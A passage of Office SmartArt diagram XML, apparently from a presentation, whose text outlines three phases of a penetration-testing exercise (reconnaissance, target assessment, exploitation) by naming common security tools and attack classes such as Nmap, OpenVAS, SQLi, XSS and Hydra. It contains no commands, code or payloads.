    <dgm:pt modelId="{C1894437-D5D7-410E-93CB-8C83A2FF2079}" type="pres">
      <dgm:prSet presAssocID="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23CD9C92-93A4-439E-901A-C1DB68E374EA}" type="pres">
      <dgm:prSet presAssocID="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77B95E59-324E-4DF3-A939-A41E460783A3}" type="pres">
      <dgm:prSet presAssocID="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{84514A4C-7024-4FA3-9DEA-A08C105C65ED}" type="pres">
      <dgm:prSet presAssocID="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82C25B21-4814-4731-9980-34AA202C317E}" type="pres">
      <dgm:prSet presAssocID="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{358C040F-0CCC-4FE7-ACE9-79CA37F8CCA8}" type="presOf" srcId="{DCF0B428-9472-4890-AC47-ABFECED07786}" destId="{8ED007BB-26B2-4756-A25F-2EDFCCAC8874}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DE3E3B12-BA5F-4AFC-B10E-D093CA3E7E86}" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" srcOrd="3" destOrd="0" parTransId="{81687973-D006-423A-9D67-A0455993C4A9}" sibTransId="{31038C07-5394-41FD-ABF5-A10C9D13383C}"/>
    <dgm:cxn modelId="{BA522626-6BDC-4C0E-ADB1-7144A89A8E1F}" type="presOf" srcId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" destId="{89521AC9-AB8B-4C77-8EBD-6D5C05163370}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B673A12C-3492-4A0B-8FBD-F6820329D265}" srcId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" destId="{DCF0B428-9472-4890-AC47-ABFECED07786}" srcOrd="0" destOrd="0" parTransId="{244176BE-8498-4423-91F2-76E2EEE9CBE0}" sibTransId="{1F1EA35D-4030-43F7-AE45-D5B4E4BED244}"/>
    <dgm:cxn modelId="{386DC12F-F8DE-4E67-8BFD-E1460C3A168D}" srcId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" destId="{5DF8B959-2381-49C0-AA3C-E6891EF2A97B}" srcOrd="0" destOrd="0" parTransId="{ABCC4EFE-F16D-4D88-B59D-FE211A34B2CE}" sibTransId="{232E41C7-C670-474D-934D-AA81CF9023BD}"/>
    <dgm:cxn modelId="{2E9E5F34-A2F4-41C0-A5B3-BE3B5C6DF558}" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" srcOrd="2" destOrd="0" parTransId="{45BED77B-3CC2-4175-9C57-387153449AE9}" sibTransId="{1271E211-1981-489D-A74A-426D3804FCDB}"/>
    <dgm:cxn modelId="{73815737-7091-48E7-AFB4-EB67F8737FB9}" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" srcOrd="0" destOrd="0" parTransId="{81F114EC-489B-49D3-A41F-4A764DD92637}" sibTransId="{66010279-CF4E-4D38-BD24-B979BA5F56D6}"/>
    <dgm:cxn modelId="{B7328764-3076-4F61-8A2D-B1ABC2A7FC3D}" srcId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" destId="{A31252F9-6FDA-44BC-AEC4-8CC832D38A3F}" srcOrd="0" destOrd="0" parTransId="{00352698-3844-4E7C-8CC0-847BFEDBAD07}" sibTransId="{BD079792-A770-4E77-9AE7-2418D7C2EEFF}"/>
    <dgm:cxn modelId="{53810565-4415-4BB3-AB41-AB8B835059AC}" type="presOf" srcId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" destId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{06445646-62F5-49B4-9D2D-FBE7163FC77D}" type="presOf" srcId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" destId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{54073D49-0BE6-42E6-9F41-4D2F421E9349}" srcId="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" destId="{E3A2D6DC-FED0-4C56-8179-85FABEA98002}" srcOrd="0" destOrd="0" parTransId="{17179ACE-13E7-47EE-ABAE-8E5DE3035471}" sibTransId="{0B1AE961-66B1-4618-B89F-C3CB36944289}"/>
    <dgm:cxn modelId="{571B2F6E-C1C7-4EC4-9EB8-317383A064E3}" type="presOf" srcId="{5DF8B959-2381-49C0-AA3C-E6891EF2A97B}" destId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B98C650-195B-4AAC-A669-14AC7A4ECEFF}" type="presOf" srcId="{E3A2D6DC-FED0-4C56-8179-85FABEA98002}" destId="{82C25B21-4814-4731-9980-34AA202C317E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{80CFD281-76BC-40E1-89B3-15DB7E7372A8}" type="presOf" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{14B905A6-FF56-410E-A1D9-C5D8C184BC01}" type="presOf" srcId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" destId="{B4220182-EC1A-41F1-A3DA-2D1D3350C1D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EE3909A7-D77B-479F-992A-7EB7CC556081}" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" srcOrd="1" destOrd="0" parTransId="{02AA8D64-43DF-47D8-ADCC-04F9A78C8C1A}" sibTransId="{C7F8EA5E-46E2-420D-BAC8-D0794816C5E1}"/>
    <dgm:cxn modelId="{4F9664A9-903F-4C80-B5B1-854530EC5D6A}" type="presOf" srcId="{A31252F9-6FDA-44BC-AEC4-8CC832D38A3F}" destId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B6154B3-CD6C-44C2-96F5-B2C09B760229}" type="presOf" srcId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" destId="{C2F41F69-52F3-44CF-9765-EBA94C2C4A06}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AE71E1DB-470A-46A4-A3E6-360919CFAA1C}" type="presOf" srcId="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" destId="{77B95E59-324E-4DF3-A939-A41E460783A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{81A43AE1-16BD-4E5B-9F14-C700DD8A4E88}" type="presOf" srcId="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}" destId="{23CD9C92-93A4-439E-901A-C1DB68E374EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50F177E4-9687-4DA4-BD36-9A494871F47E}" type="presOf" srcId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" destId="{BE440131-C756-4688-88AC-E1DB352D6A2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D51AA1CD-293D-4BC4-954F-DE356E203BE6}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2B7B1A83-2157-43CA-B85B-0624D0E84B96}" type="presParOf" srcId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" destId="{B4220182-EC1A-41F1-A3DA-2D1D3350C1D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8E73EF28-BDF0-4B1C-9AFB-EF607FBD6B94}" type="presParOf" srcId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" destId="{BE440131-C756-4688-88AC-E1DB352D6A2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FFB20EE5-A1D4-46CF-9A0A-ABE80AC3554A}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{77D38FB5-D088-4678-AE79-C66B976CEF1D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{051FCDAB-2F87-49C9-83E1-3A3963B99D1D}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{8ED007BB-26B2-4756-A25F-2EDFCCAC8874}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B4016189-0180-40C5-90C2-B222FCF5AA68}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{54E13D37-1877-49AF-98E3-20736323B693}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E7A7204B-65D7-4722-BE41-E756075C6D10}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{81ED8CF4-4B4A-43BA-A2E4-4782DC3ABACE}" type="presParOf" srcId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" destId="{C2F41F69-52F3-44CF-9765-EBA94C2C4A06}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CD49FD79-B352-4ABA-8D0A-B0CAC1C2F501}" type="presParOf" srcId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" destId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A21B35EB-391E-4441-8FFF-0887234576D9}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{9BD9F594-B3E0-44F7-985B-A2A444D1E633}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DEFEBEDA-7814-4894-A1F4-6C625A163650}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B86292E4-7D82-4B67-86FD-5C8325B62053}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{651D70B9-DA08-4F35-A0D8-B15E818BB65B}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{231B3555-C1E9-4EF9-BD3D-0570A29E686E}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F2C14B31-0853-4F6F-A4EE-05346F6EA585}" type="presParOf" srcId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" destId="{89521AC9-AB8B-4C77-8EBD-6D5C05163370}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{16A821EC-438D-4ACC-A2A5-DEEE2A81B98B}" type="presParOf" srcId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" destId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D2A04BCA-2FB9-48D1-BD49-ABD3B314C56B}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{8ECAB204-E263-4CC7-9639-EFF68C2AADFE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA288527-A975-4888-B73B-60E7C81D065E}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1CCFDAF0-6336-4225-86B3-A0B62636298F}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{870967FF-3FC3-4FFF-B79A-0D02A0E68A39}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{96AC1526-E702-4A21-A7D2-7D2A1581A51E}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{C1894437-D5D7-410E-93CB-8C83A2FF2079}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B00B60A5-E508-4879-A839-9EC25D1840EB}" type="presParOf" srcId="{C1894437-D5D7-410E-93CB-8C83A2FF2079}" destId="{23CD9C92-93A4-439E-901A-C1DB68E374EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E708BDD1-3DE3-4CDF-8A6C-D5EEC05EA7EE}" type="presParOf" srcId="{C1894437-D5D7-410E-93CB-8C83A2FF2079}" destId="{77B95E59-324E-4DF3-A939-A41E460783A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EF6952EA-2890-4C13-997A-7F00F882BB18}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{84514A4C-7024-4FA3-9DEA-A08C105C65ED}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B53EB1BD-9FAB-4C3A-B2BE-DFE03E29D55E}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{82C25B21-4814-4731-9980-34AA202C317E}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list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D007BB-26B2-4756-A25F-2EDFCCAC8874}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="368999"/>
          <a:ext cx="5486400" cy="626062"/>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312420" rIns="425806" bIns="106680" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="666750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1500" kern="1200"/>
            <a:t> Info gathering (Netdiscover, Nmap)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="368999"/>
        <a:ext cx="5486400" cy="626062"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE440131-C756-4688-88AC-E1DB352D6A2E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="274320" y="147599"/>
          <a:ext cx="3840480" cy="4428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66750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1500" b="1" kern="1200"/>
            <a:t>Phase 1 : Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="295936" y="169215"/>
        <a:ext cx="3797248" cy="399568"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1297462"/>
          <a:ext cx="5486400" cy="826875"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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312420" rIns="425806" bIns="106680" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="666750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1500" kern="1200"/>
            <a:t> Vulnerability scanning &amp; enumeration (OpenVAS, SMB, DVWA)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1297462"/>
        <a:ext cx="5486400" cy="826875"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="274320" y="1076062"/>
          <a:ext cx="3840480" cy="442800"/>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66750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1500" b="1" kern="1200"/>
            <a:t>Phase 2 : Target Assessment</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="295936" y="1097678"/>
        <a:ext cx="3797248" cy="399568"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2426737"/>
          <a:ext cx="5486400" cy="626062"/>
        </a:xfrm>
        <a:prstGeom prst="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312420" rIns="425806" bIns="106680" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="666750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1500" kern="1200"/>
            <a:t> Exploitation &amp; validation (SQLi, XSS, Hydra, Autopsy)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2426737"/>
        <a:ext cx="5486400" cy="626062"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="274320" y="2205337"/>
          <a:ext cx="3840480" cy="44280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66750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1500" b="1" kern="1200"/>
            <a:t>Phase 3 : Execution of Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1500" kern="1200"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="295936" y="2226953"/>
        <a:ext cx="3797248" cy="39956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D007BB-26B2-4756-A25F-2EDFCCAC8874}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="243855"/>
          <a:ext cx="5486400" cy="50085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249936" rIns="425806" bIns="85344" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" kern="1200"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" b="0" i="0" kern="1200"/>
            <a:t>Information gathering </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" kern="1200"/>
            <a:t>(Netdiscover, Nmap)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="243855"/>
        <a:ext cx="5486400" cy="500850"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE440131-C756-4688-88AC-E1DB352D6A2E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="274320" y="66735"/>
          <a:ext cx="3840480" cy="35424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en-IN" sz="1200" b="1" kern="1200"/>
            <a:t>Phase 1 : Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="291613" y="84028"/>
        <a:ext cx="3805894" cy="319654"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="986625"/>
          <a:ext cx="5486400" cy="500850"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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249936" rIns="425806" bIns="85344" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" kern="1200"/>
            <a:t> Vulnerability scanning &amp; enumeration (OpenVAS, SMB, DVWA)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="986625"/>
        <a:ext cx="5486400" cy="500850"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="274320" y="809505"/>
          <a:ext cx="3840480" cy="354240"/>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en-IN" sz="1200" b="1" kern="1200"/>
            <a:t>Phase 2 : Target Assessment</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="291613" y="826798"/>
        <a:ext cx="3805894" cy="319654"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1729395"/>
          <a:ext cx="5486400" cy="500850"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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249936" rIns="425806" bIns="85344" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" kern="1200"/>
            <a:t> Exploitation &amp; validation (SQLi, XSS, Hydra, Autopsy)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1729395"/>
        <a:ext cx="5486400" cy="500850"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="274320" y="1552275"/>
          <a:ext cx="3840480" cy="354240"/>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en-IN" sz="1200" b="1" kern="1200"/>
            <a:t>Phase 3 : Execution of Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" kern="1200"/>
